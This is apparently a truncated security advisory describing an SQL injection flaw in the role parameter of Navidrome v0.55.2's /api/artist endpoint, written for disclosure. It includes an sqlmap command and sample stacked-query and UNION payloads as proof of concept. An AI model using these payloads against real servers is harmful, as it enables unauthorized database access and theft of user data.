🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2 Overview This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information. Details Vulnerable Component: API endpoint → /api/artist Parameter → role Vulnerability Type: SQL Injection (stacked queries, UNION queries) Database Affected: SQLite (confirmed exploitation via SQLite-specific payloads) Impact: Successful exploitation allows an unauthenticated attacker to: Execute arbitrary SQL commands Extract or manipulate sensitive data (e.g., user records, playlists) Potentially escalate privileges or disrupt service availability Proof of Concept (PoC) Example Exploit Command: bash sqlmap.py -r navi –level 5 –risk 3 -a –banner –batch –tamper charencode –dbms sqlite Sample Payloads: Stacked Queries: https://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))– UNION-Based Query: https://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT…Read More